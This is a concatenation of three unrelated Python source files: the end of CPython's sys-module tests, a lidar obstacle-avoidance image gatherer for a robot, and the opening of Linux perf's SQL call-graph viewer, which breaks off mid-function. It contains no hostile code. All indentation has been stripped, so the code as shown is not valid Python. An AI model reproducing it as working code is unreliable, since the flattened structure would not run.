import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# Ellipsis
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('4Pi2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('15P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
if __name__ == "__main__":
unittest.main()
|
imagegatherer.py
|
import os
import cv2
from math import cos, sin, pi, floor
from adafruit_rplidar import RPLidar
import threading
import random
from datetime import datetime
import glob
from .sensorbase import SensorBase
class ImageGatherer(SensorBase):
def __init__(self, args):
super(ImageGatherer, self).__init__(args)
self.lidar = RPLidar(None, '/dev/ttyUSB0')
self.scan_data = [0]*360
self.snapshot_time = datetime.now()
image_paths = glob.glob("{}/*.jpg".format(args["imageoutput"]))
if image_paths:
self.snapshot_count = max([int(os.path.splitext(path.split(os.path.sep)[-1])[0]) for path in image_paths])
else:
self.snapshot_count = 0
print(self.lidar.info)
print(self.lidar.health)
t = threading.Thread(target=self._read_scans, args=())
t.daemon = True
t.start()
def _read_scans(self):
for scan in self.lidar.iter_scans():
for (_, angle, distance) in scan:
self.scan_data[min([359, floor(angle)])] = distance
def update_internal(self, frame):
# Capture an image
now = datetime.now()
if (now - self.snapshot_time).seconds > 5:
self.snapshot_time = now
# build a human-readable timestamp (currently unused; it could be
# drawn onto the frame with cv2.putText before saving)
ts = datetime.now().strftime("%A %d %B %Y %I:%M:%S%p")
# write the current frame to output directory
filename = "{}.jpg".format(str(self.snapshot_count).zfill(16))
path = os.path.join(self.args["imageoutput"], filename)
print("[INFO] Saving captured image to ", path)
cv2.imwrite(path, frame)
self.snapshot_count += 1
r_multiplier = random.uniform(2.0, 3.0)
l_multiplier = 1.0
turn_duration = 2.0
dist_to_obstacle = 300
roi = self.scan_data[135:225]
if any(0 < dist < dist_to_obstacle for dist in roi):
self.r_multiplier = r_multiplier if self.snapshot_count % 2 == 0 else l_multiplier
self.l_multiplier = l_multiplier if self.snapshot_count % 2 == 0 else r_multiplier
self.motor_duration = turn_duration
print("[INFO] Avoiding obstacle!")
return True
return False
def shutdown(self):
print("[INFO] Stopping rplidar")
self.lidar.stop()
self.lidar.disconnect()
|
exported-sql-viewer.py
|
#!/usr/bin/env python2
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
# Call Graph: pt_example
# Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
# v- ls
# v- 2638:2638
# v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
# |- unknown unknown 1 13198 0.1 1 0.0
# >- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
# >- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
# v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
# >- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
# >- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
# >- __libc_csu_init ls 1 10354 0.1 10 0.0
# |- _setjmp libc-2.19.so 1 0 0.0 4 0.0
# v- main ls 1 8182043 99.6 180254 99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also a "All branches" report, which displays branches and
# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtSql import *
pyside_version_1 = True
from decimal import *
from ctypes import *
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
xrange
except NameError:
xrange = range
def printerr(*args, **keyword_args):
print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
if ip < 0:
ip += 1 << 64
return "%x" % ip
def offstr(offset):
if offset:
return "+0x%x" % offset
return ""
def dsoname(name):
if name == "[kernel.kallsyms]":
return "[kernel]"
return name
def findnth(s, sub, n, offs=0):
pos = s.find(sub)
if pos < 0:
return pos
if n <= 1:
return offs + pos
return findnth(s[pos + 1:], sub, n - 1, offs + pos + 1)
# Percent to one decimal place
def PercentToOneDP(n, d):
if not d:
return "0.0"
x = (n * Decimal(100)) / d
return str(x.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
# Helper for queries that must not fail
def QueryExec(query, stmt):
ret = query.exec_(stmt)
if not ret:
raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
done = Signal(object)
def __init__(self, task, param=None, parent=None):
super(Thread, self).__init__(parent)
self.task = task
self.param = param
def run(self):
while True:
if self.param is None:
done, result = self.task()
else:
done, result = self.task(self.param)
self.done.emit(result)
if done:
break
# Tree data model
class TreeModel(QAbstractItemModel):
def __init__(self, glb, parent=None):
super(TreeModel, self).__init__(parent)
self.glb = glb
self.root = self.GetRoot()
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self.root
def rowCount(self, parent):
result = self.Item(parent).childCount()
if result < 0:
result = 0
self.dataChanged.emit(parent, parent)
return result
def hasChildren(self, parent):
return self.Item(parent).hasChildren()
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def parent(self, child):
child_item = child.internalPointer()
if child_item is self.root:
return QModelIndex()
parent_item = child_item.getParentItem()
return self.createIndex(parent_item.getRow(), 0, parent_item)
def index(self, row, column, parent):
child_item = self.Item(parent).getChildItem(row)
return self.createIndex(row, column, child_item)
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.root.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
def __init__(self, parent=None):
super(TableModel, self).__init__(parent)
self.child_count = 0
self.child_items = []
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Model cache
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()
def LookupCreateModel(model_name, create_fn):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except KeyError:  # no cached (still-alive) model under this name
model = None
if model is None:
model = create_fn()
model_cache[model_name] = model
model_cache_lock.release()
return model
# Find bar
class FindBar():
def __init__(self, parent, finder, is_reg_expr=False):
self.finder = finder
self.context = []
self.last_value = None
self.last_pattern = None
label = QLabel("Find:")
label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.textbox = QComboBox()
self.textbox.setEditable(True)
self.textbox.currentIndexChanged.connect(self.ValueChanged)
self.progress = QProgressBar()
self.progress.setRange(0, 0)
self.progress.hide()
if is_reg_expr:
self.pattern = QCheckBox("Regular Expression")
else:
self.pattern = QCheckBox("Pattern")
self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.next_button = QToolButton()
self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
self.next_button.released.connect(lambda: self.NextPrev(1))
self.prev_button = QToolButton()
self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
self.prev_button.released.connect(lambda: self.NextPrev(-1))
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(label)
self.hbox.addWidget(self.textbox)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.pattern)
self.hbox.addWidget(self.next_button)
self.hbox.addWidget(self.prev_button)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.hide()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.textbox.setFocus()
def Deactivate(self):
self.bar.hide()
def Busy(self):
self.textbox.setEnabled(False)
self.pattern.hide()
self.next_button.hide()
self.prev_button.hide()
self.progress.show()
def Idle(self):
self.textbox.setEnabled(True)
self.progress.hide()
self.pattern.show()
self.next_button.show()
self.prev_button.show()
def Find(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
self.last_value = value
self.last_pattern = pattern
self.finder.Find(value, direction, pattern, self.context)
def ValueChanged(self):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
index = self.textbox.currentIndex()
data = self.textbox.itemData(index)
# Store the pattern in the combo box to keep it with the text value
if data is None:
self.textbox.setItemData(index, pattern)
else:
